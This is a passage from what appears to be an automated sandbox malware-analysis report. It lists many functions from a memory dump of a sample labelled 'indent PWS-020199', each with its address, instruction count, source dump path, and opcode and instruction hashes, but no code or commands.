                            • Opcode Fuzzy Hash: 57b8753d29ca7364c4e0d17896b8e9a886eceb69fe20fca3deb6d1a21419adea
                            • Instruction Fuzzy Hash: 77916F71E00216BFDF15CFA9D894BAEBBB5BB88710F15416DE610EF251D734EA009BA0
                            Function 014CE3F0 Relevance: .3, Instructions: 261COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bcb8546440f4fc0e1dc75356f134979045af6617d98ba9c2bf4c52a7754b902
                            • Instruction ID: 7ee69478b40ec3438a531876bdbbf831c02593e731fde4ef953a57b8fea6be16
                            • Opcode Fuzzy Hash: 5bcb8546440f4fc0e1dc75356f134979045af6617d98ba9c2bf4c52a7754b902
                            • Instruction Fuzzy Hash: 5D913439A00616CBEB65DB59C440B7EBBA2FFA4B14F05406EED05AF3A4E734D902C791
                            Function 01506ACC Relevance: .2, Instructions: 226COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8dd1aec1922e8414b63ba3f74ca19ba9aeedd11ace4a9cd9aaafef34d99d6716
                            • Instruction ID: ee7d8c104e3b4044e486a737543d26328aa1b15059cc561eeb11a2a209aba209
                            • Opcode Fuzzy Hash: 8dd1aec1922e8414b63ba3f74ca19ba9aeedd11ace4a9cd9aaafef34d99d6716
                            • Instruction Fuzzy Hash: 0281A5B1E006169FDB25CFA9C840ABEBBF9FB58700F04852EE545DB680E734D950CBA4
                            Function 0157AB40 Relevance: .2, Instructions: 222COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                            • Instruction ID: 906b8ed670be6033c9dfce60f992a3ab72561d76ff8db7884ce8fbffde4675c2
                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                            • Instruction Fuzzy Hash: D1817072A0020A9FDF19CF99D891AAEBBF6FF84310F188569E9169F345D734E901CB50
                            Function 014EE284 Relevance: .2, Instructions: 212COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c86d962c2104173f55090f5a73b3e1b68b3c2c244846f121f965d2e8fd4c890
                            • Instruction ID: a854c92d673c8b75033c7533d3c644e93d64f421ff4707bc158287476bc3f891
                            • Opcode Fuzzy Hash: 4c86d962c2104173f55090f5a73b3e1b68b3c2c244846f121f965d2e8fd4c890
                            • Instruction Fuzzy Hash: 01815E71A00619AFDB25CFA9C884AEEBBF9FF88354F10442EE555A7360D770AC45CB60
                            Function 014CC640 Relevance: .2, Instructions: 206COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db71596051ba4c6b3814c2b72e06ebb1514e8a8008989a534b2bcbb2a81cddd9
                            • Instruction ID: 758845975f28787e8627caa2e67b34ae5b97bf13405fcf166e9f15c289a2b3c8
                            • Opcode Fuzzy Hash: db71596051ba4c6b3814c2b72e06ebb1514e8a8008989a534b2bcbb2a81cddd9
                            • Instruction Fuzzy Hash: D971DD79D0122ADFDB268F59C9907BEBBB0FF58B10F54415EE856AB364D3309805CBA0
                            Function 015647A0 Relevance: .2, Instructions: 202COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11bbeea89bec17a4bfa40ad3b47fb9e4125d991490f1f13a9fdc913f47329189
                            • Instruction ID: 69d93bfa066b59163098a2b3a5fb00aeb2c46a0b05196038d738d75545f820cf
                            • Opcode Fuzzy Hash: 11bbeea89bec17a4bfa40ad3b47fb9e4125d991490f1f13a9fdc913f47329189
                            • Instruction Fuzzy Hash: 39719E70A40245EFDB24CFA9D950A9EBFFDFF90340F49815AE620AF298C7718944DB94
                            Function 014C260B Relevance: .2, Instructions: 201COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9626fa83bee85a2c97ae065f76667800d484df1df9669cc58037717aa6ed7e38
                            • Instruction ID: 720551fa63d00c3efbbcac342ad4375e0f88a8d250dc4d65bff8ed3996f5f08c
                            • Opcode Fuzzy Hash: 9626fa83bee85a2c97ae065f76667800d484df1df9669cc58037717aa6ed7e38
                            • Instruction Fuzzy Hash: F371D2397046429FD352DF2CC480B6AB7E5FF94710F0485AEE8998B361DBB4D846CBA1
                            Function 0153035C Relevance: .2, Instructions: 198COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                            • Instruction ID: f7391a0c09604ee458bf00213f3670f467528f80f9f921c875f731c0c51b9a4e
                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                            • Instruction Fuzzy Hash: 55716071A0061AEFDB11DFA9C984EDEBBB9FF98700F104569E505EB290DB34EA01CB50
                            Function 015462A0 Relevance: .2, Instructions: 198COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3849df167d37a9bb142b28c37e16d3ae5d97eed6b03abf0792181e9fc8abbdf5
                            • Instruction ID: b6421eb19b4996a3dacf1896bbe979ee2df09420b32add888735f38dc4fb08af
                            • Opcode Fuzzy Hash: 3849df167d37a9bb142b28c37e16d3ae5d97eed6b03abf0792181e9fc8abbdf5
                            • Instruction Fuzzy Hash: 5C71E132200B02AFEB32CF19C884F5ABBE6FB55728F15482DE6158F2A0D774E944CB50
                            Function 01588324 Relevance: .2, Instructions: 192COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc0c222d1c47b03368f43210891114f397dde37882955c455a700c187dc34c52
                            • Instruction ID: 12826c632474f2e90521f80804bba61852849277c1b1c24a027a55c709806195
                            • Opcode Fuzzy Hash: dc0c222d1c47b03368f43210891114f397dde37882955c455a700c187dc34c52
                            • Instruction Fuzzy Hash: F2711B71E0020ABFDB15DF95CC41FEEBBB9FB14350F50412AE610BA290D774AA05CBA0
                            Function 0156A250 Relevance: .2, Instructions: 184COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4679dcc30f1dce3961f5ec3bca2cbdefaecaeb516a8f9bb21fce4cfd29c2d048
                            • Instruction ID: 187bc803dc0e49ed9af30bcd682227ac9fd0d43dfe4a6c8941f6838b4e2148a0
                            • Opcode Fuzzy Hash: 4679dcc30f1dce3961f5ec3bca2cbdefaecaeb516a8f9bb21fce4cfd29c2d048
                            • Instruction Fuzzy Hash: F6516C72504612AFD721DA68C844B5BBBECFBD5750F05492EBA40EF250E670ED05CBE2
                            Function 01558350 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c98f1db26b6e95db80bad0aa5713b1dbb7a9e5509cafb5545ba62d96d7ff8a1f
                            • Instruction ID: 6b70b88331cd2b5875e27b4cb7d36eb547d8eda8777cd8c0db9a4e8bcd1bdc56
                            • Opcode Fuzzy Hash: c98f1db26b6e95db80bad0aa5713b1dbb7a9e5509cafb5545ba62d96d7ff8a1f
                            • Instruction Fuzzy Hash: FD51BD70900705DFD761CF5AC890AABFBF8BF94714F104A1FEA929B6A1C7B0A541CB50
                            Function 014EE443 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b1d6c48604ae19804c2dfc967fda7724702173dae95ba62782abe70b1ec75da
                            • Instruction ID: 420b28202bd8bcd9f9f08f4a1c63670f769bf84cb70431fca85722179ca65a80
                            • Opcode Fuzzy Hash: 3b1d6c48604ae19804c2dfc967fda7724702173dae95ba62782abe70b1ec75da
                            • Instruction Fuzzy Hash: 2A517E72200A15DFCB22EFAAC984EAAB3F9FF25744F51046EE65197270D734E941CB50
                            Function 01554180 Relevance: .2, Instructions: 156COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a5dbd0b363466d0d122f4ab9bb6122d55b3a2478124646e55aa9eda8b981d0bc
                            • Instruction ID: 138564701b1869d3a744ffc76d0614d28d21bacecf8853dabef2f057afb60306
                            • Opcode Fuzzy Hash: a5dbd0b363466d0d122f4ab9bb6122d55b3a2478124646e55aa9eda8b981d0bc
                            • Instruction Fuzzy Hash: C9518F716083028FD794DF29C890A6FB7E5BFD8204F45492EF985CB261E730D985CB52
                            Function 014D45B1 Relevance: .2, Instructions: 156COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction ID: 58eab6dd20cd9fecc70c37c1fa6b09511a92a942b84815f2f79914523fd97bf4
                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction Fuzzy Hash: 1A51EF75E0021AABDF12CF98C460BFEBBB5AF54310F09406AEA05AB360D734DD44CBA0
                            Function 0153E9E0 Relevance: .2, Instructions: 154COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                            • Instruction ID: 84b59caf878e72458e835e0250bc67135ed374ec1c47279324a3632ef2f5f913
                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                            • Instruction Fuzzy Hash: 9351B931D0020AEFDF169F94C896FAEBBF5FB90314F154659D6116B290D7709E418BA0
                            Function 01578B28 Relevance: .2, Instructions: 152COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8098024e3f0d7bb48b5287e1935c3c22eec316f95ef2a1a2eb6c0c7dbbc8f12
                            • Instruction ID: 764c00e6720f204bd8dd565b8cb2d5505fd2390541b74f14c3fce759befae6f4
                            • Opcode Fuzzy Hash: f8098024e3f0d7bb48b5287e1935c3c22eec316f95ef2a1a2eb6c0c7dbbc8f12
                            • Instruction Fuzzy Hash: B041DB717016129BD725DB2DE89AF7FBB9AFFD0620F088519E9598F280D730D801C791
                            Function 0153CBF0 Relevance: .1, Instructions: 148COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f0a58eb807297c655ebc58533a219c7a53fd742b1427339274873b13fb02e3d
                            • Instruction ID: 5e3813d31fb3726cab0727e69ad9d050adaa67f9a606f4ea7fb120aa928ed561
                            • Opcode Fuzzy Hash: 1f0a58eb807297c655ebc58533a219c7a53fd742b1427339274873b13fb02e3d
                            • Instruction Fuzzy Hash: 7A518E7590021ADFCB20DFA9C98499EBBB9FB98314B55491AE516BB300D734AD01CB90
                            Function 0157A9D3 Relevance: .1, Instructions: 139COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                            • Instruction ID: 42dd89a2f412ab4c8c8be773bcb08255b2e0e6a5823ad9368aaec86c0885ff64
                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                            • Instruction Fuzzy Hash: F041F9726007169FDB25DF28D981A6FB7E9FF90210B09462EE9568F640EB70ED14C7D0
                            Function 014E01F8 Relevance: .1, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e8fe7a896e98fad32e1d27832541b67f6c0cffaa56dbac167121f190c901e54
                            • Instruction ID: a366b117288730945c38f04393a2189fe4d3421a757511f273caabaa6197d243
                            • Opcode Fuzzy Hash: 5e8fe7a896e98fad32e1d27832541b67f6c0cffaa56dbac167121f190c901e54
                            • Instruction Fuzzy Hash: 1541AC36A012159BDB11DF98C444AEEB7F4BF58611F14812BF825AB360D7B49C42CBA4
                            Function 014DEBFC Relevance: .1, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47838f556248d009c2b0978d954c1e7d25bf3ef14d142e4bb78444a37f13386b
                            • Instruction ID: cc6f18bfddb6cf349fc6ef51a6ab4d8d8d734b3024baef24772ef8c0215fefe9
                            • Opcode Fuzzy Hash: 47838f556248d009c2b0978d954c1e7d25bf3ef14d142e4bb78444a37f13386b
                            • Instruction Fuzzy Hash: F041E4712003029FEB21DF29C894A2BB7E5FF98614F45482FE557DB325DB71E8498B50
                            Function 014F2750 Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction ID: fb63e463adf30970e5ae953e7002f958b1a6a9df7238b4dc64974d23b8e6d93d
                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction Fuzzy Hash: 84516C76A00625CFCB15CF58C480AADF7B2FF85710F2481A9D915AB795D770EE42CB90
                            Function 014B6154 Relevance: .1, Instructions: 133COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 575c645b5bf9077f0663018236f19afeb329b2874d2c121d50b1a6018be9275e
                            • Instruction ID: 9a52bb93c7c1d7a8a931b4da5453ed6c82db547a501a5b9fb999efade10dbcb4
                            • Opcode Fuzzy Hash: 575c645b5bf9077f0663018236f19afeb329b2874d2c121d50b1a6018be9275e
                            • Instruction Fuzzy Hash: C6510670940217DBEB2A9B28CC40BEDBBB1FF21314F1582AAD5259B2E5D7749981CF50
                            Function 014B0BCD Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 197783bf2be15d7a3d6aa48847f7383877db1fa6b7a4e9e0b247210c0c79535e
                            • Instruction ID: d83d085b63af053fe4ef72de6650f063db1b4e833fbf122d0e769eec37abc7ed
                            • Opcode Fuzzy Hash: 197783bf2be15d7a3d6aa48847f7383877db1fa6b7a4e9e0b247210c0c79535e
                            • Instruction Fuzzy Hash: 9041C476A00228DBDB21DF69C881BEE77B4FF54740F0504AAE908AB251D7749E81CF91
                            Function 0157866E Relevance: .1, Instructions: 129COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction ID: dec2726912a24e31e2d62df118fc6b858314ebd5b1a466267891ffa05a341a01
                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction Fuzzy Hash: B341A675B00106ABDB15DF99DC9AABFBBBABF98600F244069E905EB341D670DD01C7A0
                            Function 014B0887 Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94a79caa1505723f988b1de932195bba06284d1b069bcd920656012608591244
                            • Instruction ID: 1a7a47ae35e795cae5f0f790434729828ff2a88af28662a560e27127e5efeda2
                            • Opcode Fuzzy Hash: 94a79caa1505723f988b1de932195bba06284d1b069bcd920656012608591244
                            • Instruction Fuzzy Hash: 4341E2706007029FE325CF29C580A67B7F5FF58315B144A6FE55787A60E770E846CBA0
                            Function 014DA470 Relevance: .1, Instructions: 127COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39b51515a2f89d82a165a1667e9f60013c190c7e54e76b83370996f3e2e08251
                            • Instruction ID: 4f9761fdef475f628bee202c345a1027d5f6167523bb2cdcee5ff9ea70806965
                            • Opcode Fuzzy Hash: 39b51515a2f89d82a165a1667e9f60013c190c7e54e76b83370996f3e2e08251
                            • Instruction Fuzzy Hash: 0341F332980205CFDF22DF68C4A47EE7BB4FB54310FA9016AD521AB3A5DB74D905CB64
                            Function 014B8BF0 Relevance: .1, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ede6530af7a30ceee49f400e42f9a89ab1b13c3320dec0d2a942d03e0816ad8f
                            • Instruction ID: c8894c0cc2324323e133c68e6a18e73e49de61aa8b7d87233602c008259f3aeb
                            • Opcode Fuzzy Hash: ede6530af7a30ceee49f400e42f9a89ab1b13c3320dec0d2a942d03e0816ad8f
                            • Instruction Fuzzy Hash: 96412671900203CBD7259F89C880A9EBBBDFB94710F69802FD5219F365D374D802DBA0
                            Function 014A8918 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 852607fbd45ab082d79a3b90bbafac534dbf176da75e7864998eed113dd304b6
                            • Instruction ID: 1563115baf6075314d793e181214efa8859266b146d8974e13fac53c07ac018e
                            • Opcode Fuzzy Hash: 852607fbd45ab082d79a3b90bbafac534dbf176da75e7864998eed113dd304b6
                            • Instruction Fuzzy Hash: AC414D755083069ED712DF658880A6BF6E9FF94B54F81092FF984DB260E730DE058B93
                            Function 014AA020 Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction ID: f6ba070304c21f8246e5a20796d76cd38e1ecfbf0ae882d6fc5173ea4f873110
                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction Fuzzy Hash: 85413C75A04211DBDB12DE9984C0BBEBB71FB70754FA7806FE9558F290D6329D40CB90
                            Function 014B09AD Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 968686f8fa13ab371cc3efe7481d8f9c4dc706387fc77cfad1cc7e0a48b1c255
                            • Instruction ID: dcb146371944a3248aaa56a80c3f80fd07aaec60d6fb9d8fd7cfdec2437a9932
                            • Opcode Fuzzy Hash: 968686f8fa13ab371cc3efe7481d8f9c4dc706387fc77cfad1cc7e0a48b1c255
                            • Instruction Fuzzy Hash: D7414A71640601DFD721CF59C880B67BBF4FB68715F248A6EE4498B361E771E9428BA0
                            Function 014E0710 Relevance: .1, Instructions: 121COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction ID: bbbfb0c8504e505f416fe5459eaf85b227ccad997d719644269bdd719926071d
                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction Fuzzy Hash: 11413975A00605EFDB24CF99C994AAABBF4FF18701B10496EE566D7260D370EA44CF50
                            Function 014B262C Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7562e07bf0321097cf53db908387108db105b61f37108bd47d96e95229efb89
                            • Instruction ID: 514bbc3bca5d5e32dead53de0a9df267f71da994df0d03d250861b813d07e1f7
                            • Opcode Fuzzy Hash: b7562e07bf0321097cf53db908387108db105b61f37108bd47d96e95229efb89
                            • Instruction Fuzzy Hash: 5841AD71901705CFC722EF69C980A9AB7F5FF64310F1585AFC41A9B2B1DBB0A941CB61
                            Function 014EC8F9 Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a27da9df19fac2e3ba102ab3c20c93a1e54ebbbd1755c3c76ad16b8b817ab0d
                            • Instruction ID: 86850f4f2da0876ab766f76735dbf546c65b5189a5caa1f47818cd3a8b8d9fb2
                            • Opcode Fuzzy Hash: 2a27da9df19fac2e3ba102ab3c20c93a1e54ebbbd1755c3c76ad16b8b817ab0d
                            • Instruction Fuzzy Hash: 84317AB2A01355DFDB12DFA8D040799BBF0FB49715F2081AED119EB2A1D3369902CF90
